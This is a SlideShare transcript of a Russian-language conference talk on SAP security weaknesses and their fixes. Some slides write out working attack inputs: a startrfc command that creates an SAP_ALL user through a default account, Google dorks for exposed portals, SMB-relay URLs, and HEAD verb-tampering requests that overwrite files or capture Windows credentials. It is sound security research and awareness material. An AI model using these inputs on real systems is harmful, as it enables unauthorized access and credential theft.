Sap risspa

2,074 views
1,970 views

Published on

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,074
On SlideShare
0
From Embeds
0
Number of Embeds
206
Actions
Shares
0
Downloads
34
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Sap risspa

  1. 1. Invest in securityto secure investmentsВзломать SAP за 60 cекундАлександр ПоляковТехнический Директор, Digital Securityat RiSSPA
  2. 2. яerpscan.com ERPScan — invest in security to secure investments 2
  3. 3. Доклады о безопасности SAP • Всего более 40erpscan.com ERPScan — invest in security to secure investments 3
  4. 4. Количество SAP notes за год • Всего более 1500 на сентябрь 2011гerpscan.com ERPScan — invest in security to secure investments 4
  5. 5. Публичная информация об уязвимостях • Всего более 150erpscan.com ERPScan — invest in security to secure investments 5
  6. 6. SAP не дремлет Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасеerpscan.com ERPScan — invest in security to secure investments 6
  7. 7. Поговорим о безопасности • Что мы знаем о SAP? • Проблемы ответственности и контроля • Примеры обхода SOD • Уязвимости ABAP движка из интернет • Уязвимости J2EE движка из интернет • Взломать SAP за 60 секунд демоerpscan.com ERPScan — invest in security to secure investments 7
  8. 8. Что мы знаем о SAP Shut up And Pay Вставьте рисунок на слайд, скруглите верхний левый и нижний правый угол (Формат – Формат рисунка), добавьте контур (оранжевый, толщина – 3)erpscan.com ERPScan — invest in security to secure investments 8
  9. 9. SAP? Who cares?erpscan.com ERPScan — invest in security to secure investments 9
  10. 10. Постоянные новые угрозы • Тема атак на SAP стала • Администраторы не достаточно “модной” в security community осведомлены • Публикуется множество • Понимание безопасности уязвимостей только на уровне матрицы SOD • Ежегодно появляются угрозы • Системы усложняются Что делать?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 10
  11. 11. Как атакуют? 2007 – Архитектурные уязвимости RFC 2008 – Атаки на рабочие станции SAP 2009 – Бэкдоры для SAP, атаки на SAPRouter 2010 – Атаки на WEB-приложения SAP 2010 – Stuxnet под SAP 2011 – Архитектурные и программные уязвимости в ERP Что дальше?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 11
  12. 12. Последний год 2011 – Атаки на JAVA движок SAP 2011 – SQL инъекции в ABAP 2011 – Переполнение буффера в ABAP 2011 – Атаки Session Fixation в SAP 2011 – Атаки на SAPGUI 2011 – Спуфинг и перехват DIAG протокола Что дальше?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 12
  13. 13. Угрозы для бизнеса Шпионаж • Кража финансовой информации • Кража персональных секретов • Списки поставщиков и контрагентов Саботаж • Отказ в обслуживании • Модификация финансовой отчетности • Нарушение работоспособности доверенных систем (SCADA) Мошенничество • Подмена данных о платежах • Ложные транзакцииerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 13
  14. 14. Как защищаемся?Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение: Программы класса GRCУровень осведомлённости о проблеме - ВысокийБезопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение: Сканирование/Мониторинг/Тестирование на проникновениеУровень осведомлённости о проблеме - НизкийБезопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение: программный или ручной аудит кодаУровень осведомлённости о проблеме - Низкийerpscan.com ERPScan — Leading SAP AG partner in discovering and solving security vulnerabilities 14
  15. 15. Что происходит сейчас Ок, вы потратили XXX млн. $ на лицензию SAP GRC + XXXX млн $ на консультантов, оптимизацию SOD и привели красивый отчёт для руководства, что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000. И в следующем году планируется уменьшить до 1000 А как обстоят дела с настройками безопасности платформы?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 15
  16. 16. Как проконтролировать безопасность столь сложной системы ?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 16
  17. 17. 1001 Способ обойти SOD • Не диалоговые пользователи • Прямой доступ к таблицам • Безопасность сервисов типа Gateway и Massage Server и прочих • Хитрые настройки • Доступ из интернет • Уязвимостиerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 17
  18. 18. Не диалоговые пользователи Миф: Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации Есть множество RFC функций для создания пользователя: Пример1 SUSR_RFC_USER_INTERFACE startrfc -3 -h 172.16.0.63 -s 01 -c 001 -u SAPCPIC -p admin –F SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES,12,r=SAP_ALL Пример2 BAPI_USER_CREATE1erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 18
  19. 19. Атаки на Gateway и Message Server • Атаки описаны в руководстве по безопасности SAP • Позволяют: – неавторизированно зарегистрировать ложный сервер приложений – вызвать зарегистрированный RFC сервис типа SAPXPG – зарегистрировать свой RFC сервис • Есть настройки, позволяющие элементарно закрыть уязвимости Если это так просто и очевидно, почему в 90% аудитов настроено не безопасно?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 19
  20. 20. Хитрые настройки Администратор выставил следующие настройки: login/min_password_uppercase = 2 login/min_password_lng = 8 login/min_password_specials = 2 login/password_compliance_to_current_policy = 0 login/password_max_idle_productive =90 login/password_max_idle_initial = 90 В чём проблема?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 20
  21. 21. Прямой доступ к таблицам • Чтение таблиц – через транзакции: SE16, SM31, SM30, SA38, SE38 – через RFC вызовы: RFC_READ_TABLE • Критичные таблицы: USR02 — хеши паролей SSF_PSE_D — ключи для SSO доступа RFCDES – пароли в открытом и зашифрованном виде ICFSERVLOC - пароли для ICF сервисов в открытом виде и ещё немного пока под секретомerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 21
  22. 22. Доступ из интернет + уязвимостиerpscan.com ERPScan — invest in security to secure investments 22
  23. 23. Атаки на ICM (ABAP) Более 1500 сервисов с критичным функционалом 1) По умолчанию разрешён доступ любым пользователем 2) Для доступа к /sap/bc/soap/rfc не проверяется авторизация S_RFC 3) Используя пароли по умолчанию типа TMSADM/PASSWORD Как итог - полный контроль системы злоумышленникомerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 23
  24. 24. Прочие небезопасные сервисы • /sap/public/info — информация о системе анонимно • /sap/public/icf_info/icr_groups — информация о приложениях • /sap/bc/soap/rfc — выполнение RFC команд удаленно, DOS • /sap/bc/srt/xip/sap — выполнение критичных действий • /sap/bw/Bex — просмотр критичных инфообъектов • /sap/bc/bsp/sap/htmlb_samples — тестовый сервис • /sap/bc/gui/sap/its/webgui — SAPGUI через WEB Нами изучено более 50 небезопасных сервисовerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 24
  25. 25. Атаки на J2EE Engine NetWeaver J2EE = интеграция, управление, взаимодействие • SAP Portal • SAP PI • SAP XI • SAP Mobile Infrastructure • SAP Solution Managererpscan.com ERPScan — invest in security to secure investments 25
  26. 26. J2EE Platform Architectureerpscan.com ERPScan — invest in security to secure investments 26
  27. 27. Удалённый доступ Service Name Port Number Default Value Range (min-max) HTTP 5NN00 50000 50000-59900 HTTP over SSL 5NN01 50001 50001-59901 IIOP 5NN07 50007 50007-59907 IIOP Initial Context 5NN02 50002 50002-59902 IIOP over SSL 5NN03 50003 50003-59903 P4 5NN04 50004 50004-59904 P4 over HTTP 5NN05 50005 50005-59905 P4 over SSL 5NN06 50006 50006-59906 Telnet 5NN08 50008 50008-59908 LogViewer control 5NN09 50009 50009-59909 JMS 5NN10 50010 50010-59910 По умолчанию шифрование на всех портах отключеноerpscan.com ERPScan — invest in security to secure investments 27
  28. 28. Уязвимый алгоритм шифрования паролей в P4 • P4 - протокол, используемый утилитой Visual Admin • Все данные передаются в открытом виде • К сожалению (счастью), пароль закодирован Как он закодирован?erpscan.com ERPScan — invest in security to secure investments 28
  29. 29. Уязвимый алгоритм шифрования паролей в P4erpscan.com ERPScan — invest in security to secure investments 29
  30. 30. Уязвимый алгоритм шифрования паролей в P4 Удиви меняerpscan.com ERPScan — invest in security to secure investments 30
  31. 31. Уязвимый алгоритм шифрования паролей в P4 /* 87 */ char mask = 43690; /* 88 */ char check = 21845; /* 89 */ char[] result = new char[data.length + 1]; /* */ /* 91 */ for (int i = 0; i < data.length; ++i) { /* 92 */ mask = (char)(mask ^ data[i]); /* 93 */ result[i] = mask; /* */ } /* 95 */ result[data.length] = (char)(mask ^ check); /* */ /* 97 */ return result;erpscan.com ERPScan — invest in security to secure investments 31
  32. 32. Защита • Используйте SSL для шифрования всех соединений между SAP системами. http://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940 cbf2195de10000000a1550b0/content.htmerpscan.com ERPScan — invest in security to secure investments 32
  33. 33. Взлом из интернет SAP системы доступны только из внутренней сети, о да, в самом деле? inurl:/irj/portal inurl:/IciEventService sap inurl:/IciEventService/IciEventConf inurl:/wsnavigator/jsps/test.jsp inurl:/irj/go/km/docs/erpscan.com ERPScan — invest in security to secure investments 33
  34. 34. Из чего состоит J2EE Engine SAP NetWeaver 6.4 300 web –приложенийerpscan.com ERPScan — invest in security to secure investments 34
  35. 35. Из чего состоит J2EE Engine SAP NetWeaver 7.0 500 web –приложенийerpscan.com ERPScan — invest in security to secure investments 35
  36. 36. Из чего состоит J2EE Engine SAP NetWeaver 7.1 800 web –приложенийerpscan.com ERPScan — invest in security to secure investments 36
  37. 37. Из чего состоит J2EE Engine SAP NetWeaver 7.2 1200 web –приложений, и это только в TRIALerpscan.com ERPScan — invest in security to secure investments 37
  38. 38. Раскрытие информации • Версия системы DSECRG-11-023,DSECRG-11-027, DSECRG-00208 • Логи и трейсы DSECRG-00191,DSECRG-00232 • Имена пользователей DSECRG-11-034 New • Сканирование внутренней сети через внешний уязвимый сервер DSECRG-11-032 DSECRG-00175 Newerpscan.com ERPScan — invest in security to secure investments 38
  39. 39. Раскрытие информации DSECRG-11-023erpscan.com ERPScan — invest in security to secure investments 39
  40. 40. Раскрытие информации DSECRG-11-027erpscan.com ERPScan — invest in security to secure investments 40
  41. 41. Раскрытие информации DSECRG-11-032 Host is not alive HTTP port Port closed SAP porterpscan.com ERPScan — invest in security to secure investments 41
  42. 42. Раскрытие информации DSECRG-00231erpscan.com ERPScan — invest in security to secure investments 42
  43. 43. Защита • SAP notes: 1548548,1545883,1503856,948851, 1545883 • Удаление ненужных и не поддерживаемых приложенийerpscan.com ERPScan — invest in security to secure investments 43
  44. 44. Межсайтовый скриптинг 15.09.2011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability 19.08.2011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS 19.07.2011 [DSECRG-11-028] SAP NetWeaver ISpeak – XSS 20.06.2011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS 20.06.2011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS 12.04.2011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS 12.04.2011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS 14.03.2011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS 14.03.2011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS 14.03.2011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS 14.03.2011 [DSECRG-11-010] SAP NetWeaver logon.html - XSS 14.03.2011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS 14.12.2010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS 14.12.2010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS 14.12.2010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS 14.12.2010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS 11.11.2010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS И это только те, что закрыты !erpscan.com ERPScan — invest in security to secure investments 44
  45. 45. SMBRelay http://server:port/mmr/MMR?filename=smbsnifferanyfileerpscan.com ERPScan — invest in security to secure investments 45
  46. 46. CSRF + SmbRelay = CSSR http://server:port/mmr/MMR?filename=smbsnifferanyfile Заставь нажать на эту ссылку того, у кого есть к ней доступerpscan.com ERPScan — invest in security to secure investments 46
  47. 47. Защита от CSRF Встроенное API для защиты от CSRF • Standard XSRF Protection. Вся работа реализуется сервером приложений (простые GET/POST) • Custom CSRF Protection. Обработка CSRF токенов на разработчике Есть множество мест, где эта защита не реализованаerpscan.com ERPScan — invest in security to secure investments 47
  48. 48. SPMLerpscan.com ERPScan — invest in security to secure investments 48
  49. 49. Аутентификация Declarative Programmatic Используя WEB.XML Используя UME Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmaticerpscan.com ERPScan — invest in security to secure investments 49
  50. 50. Декларативная аутентификация <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet-class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping> <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>erpscan.com ERPScan — invest in security to secure investments 50
  51. 51. Обход аутентификации Invoker Servlet• Можно вызвать любой сервлет напрямую по имени класса• Пример вызова - /servlet/com.sap.admin.Critical.Action• Порядка 30 приложений из 150 уязвимо (SAP ECC 6)erpscan.com ERPScan — invest in security to secure investments 51
  52. 52. Защита• Параметр “EnableInvokerServletGlobally” установить в “false”• Для включения опции только для конкретных приложений - note 1445998• Для SAP NetWeaver Portal – note 1467771• Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan web.xml scanner manually.erpscan.com ERPScan — invest in security to secure investments 52
  53. 53. Массовый взлом • I have a dream …….erpscan.com ERPScan — invest in security to secure investments 53
  54. 54. Уязвимость Verb Tampering <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource- name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> А что если попробовать HEAD вместо GET?erpscan.com ERPScan — invest in security to secure investments 54
  55. 55. Отказ в обслуживании Приложение Integration Directory HEAD /dir/support/CheckService?cmd_check&fileNameL=DEFAULT1.PFL& directoryNameL=D:usrsapDM0SYSprofile HTTP/1.0 Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети интернетerpscan.com ERPScan — invest in security to secure investments 55
  56. 56. Получение доступа к ОС Приложение Integration Directory HEAD /dir/support/CheckService?cmd_check&fileNameL=DEFAULT1.PFL& directoryNameL= smbsniffersniff HTTP/1.0 Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под управлением Windows.erpscan.com ERPScan — invest in security to secure investments 56
  57. 57. Полный контроль • Обнаружили секретный интерфейс для управления JAVA движком – Удалённое администрирование пользователей – Доступ к ОС – Выполнение произвольных команд – Выключение сервера • Установлен по умолчанию • Уязвим к Verb Tampering • Атака возможна без аутентификации из Интернет!erpscan.com ERPScan — invest in security to secure investments 57
  58. 58. Взломать SAP за 60 секунд ДЕМООООООООООООО!!!!!!!!!!!!!!erpscan.com ERPScan — invest in security to secure investments 58
  59. 59. Победаerpscan.com ERPScan — invest in security to secure investments 59
  60. 60. Защита • SAP note 1503579, 1616259 • ERPScan WEB.XML check tool • Отключение ненужных сервисовerpscan.com ERPScan — invest in security to secure investments 60
  61. 61. Итоги Проблема ответственности и контроляerpscan.com ERPScan — invest in security to secure investments 61
  62. 62. Будущая работа Конференции: • 11 October - HITB в Кула-Лумпуре (Малайзия) • 25 October - HackerHalted в Miami (США) • 25 November – ZeroNights в Санкт-Петербурге (Россия) Новости: • dsecrg.ru • erpscan.ru Cпасибо: • Дмитрий Частухин, Дмитрий Евдокимов, Алексей Cинцов, Алексей Тюрин, Павел Кузьмин, Антон Спирин. • Организаторам Risspa Опрос: • Тренинг по безопасности SAPerpscan.com ERPScan — invest in security to secure investments 62
  63. 63. ZeroNights — международная конференция, посвященная техническим аспектаминформационной безопасности. На конференции выступят известные экспертыотрасли из России, Европы, США, Индии, Сингапура и других стран. Главная цельконференции — распространение информации о новых методах атак, угроз изащиты от них, а кроме того, создание площадки для общения специалистов-практиков по ИБ.

×